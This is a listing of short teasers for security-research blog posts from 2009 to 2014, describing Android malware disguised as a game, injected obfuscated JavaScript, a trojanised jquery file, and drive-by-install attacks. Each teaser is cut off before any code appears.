A recent article by Italian IT company, TG Soft brought to light an Android malware that is being served by the official Google Play Store. According to Google Play statistics, the application was installed on 10,000-50,000 devices. The malware presents itself as an application called 'Real Basketball' in the official Google Play Store. However, it is designed to confuse the user by its appearance. It appears in the main menu as the 'Google Play Store' application itself. Fig : Phone's main menu after installation of malware One of the Play... [Read More]
by RSS Ruchna Nigam  |  Jan 22, 2014  |  Filed in: Security Research
Mysterious, yet familiar Over the past couple of months, there has been a noticeable increase of heavily obfuscated JavaScript code that embeds malicious iframes. Most of those code were injected into JavaScript files included from compromised websites (instead of the home page), which is supposedly harder to spot by the website's admin. An example of such injected JavaScript code looks like this: Note that the comments around the obfuscated code (/d47c75/ and //d47c75/in this case) around the injected code serves as an injection marker for an... [Read More]
by RSS Patrick Yu  |  Oct 01, 2013  |  Filed in: Security Research
In a post last week regarding the new 'hack' against Mega, MegaPWN, we talked about the implementation of a GreaseMonkey script to avoid being a victim of a hack on Mega servers. The script would mainly look for changes in the "crypto-magic" performing JavaScripts loaded from Mega. I decided to give it a try and wrote a TamperMonkey script (the Chrome equivalent of GreaseMonkey) called MEGACheck that runs everytime a user visits Mega, and performs the aforementioned integrity check. What Is TamperMonkey(TM)? Tampermonkey is a free browser... [Read More]
by RSS Ruchna Nigam  |  Sep 11, 2013  |  Filed in: Security Research
I had always wanted to look into Firefox OS. It's done. I created my first application. What kind of application does a reverse engineer write as first app? A CrackMe of course. You can try it: the sources are available here. But, honestly, it is really a very (very) simple CrackMe, as my real goal was to get acquainted with Firefox OS, and understand the possible risks in terms of malware. We, anti-virus analysts, won't need disassemblers or decompilers for Firefox OS malware That's cool, isn't it (although part of the mystery of our job is... [Read More]
by RSS Axelle Apvrille  |  Jul 30, 2012  |  Filed in: Security Research
Recently, we stumbled upon a strange Javascript file; at first sight, it looked like a totally legitimate, clean file. The file name is jquery.js and has all the characteristics of a proper jquery file. Even the header was kept: /* * jQuery JavaScript Library v1.3.1 * * * Copyright (c) 2009 John Resig * Dual licensed under the MIT and GPL licenses. * * * Date: 2009-01-21 20:42:16 -0500 (Wed, 21 Jan 2009) * Revision: 6158 */ jquery is a popular javascript library used as said on the homepage ( [Read More]
by RSS David Maciejak  |  Apr 30, 2009  |  Filed in: Security Research
While malicious servers hosting "drive-by-install" scripts are continuously evolving, their goal remain the same: to silently drop and run malicious files on the victim's computer. The flaws exploited by those Web Attacks Toolkits have been quite the same for a while, so what's new in "malscripts" world? As we pointed in a previous post, malicious web-based exploits writers worked out some advanced obfuscation methods to hide their malicious scripts from detection. It seems that this trend is taming down and being replaced by a simpler yet effective... [Read More]
by RSS David Maciejak  |  Mar 04, 2009  |  Filed in: Security Research
Legitimate -- and sometimes renowned -- web sites are more and more subject to code-injection attacks; and it's not rare today to find your every day site injected with malicious JavaScript code, which sole purpose is to silently redirect all visitors to malicious servers "behind the scenes." What happens on those servers is called a "drive-by-install" in the jargon, and results in malicious executable files being (again) silently pushed and run on the victim's computer. Details on the drive-by-install process, while interesting, are out of the... [Read More]
by RSS David Maciejak  |  Feb 25, 2009  |  Filed in: Security Research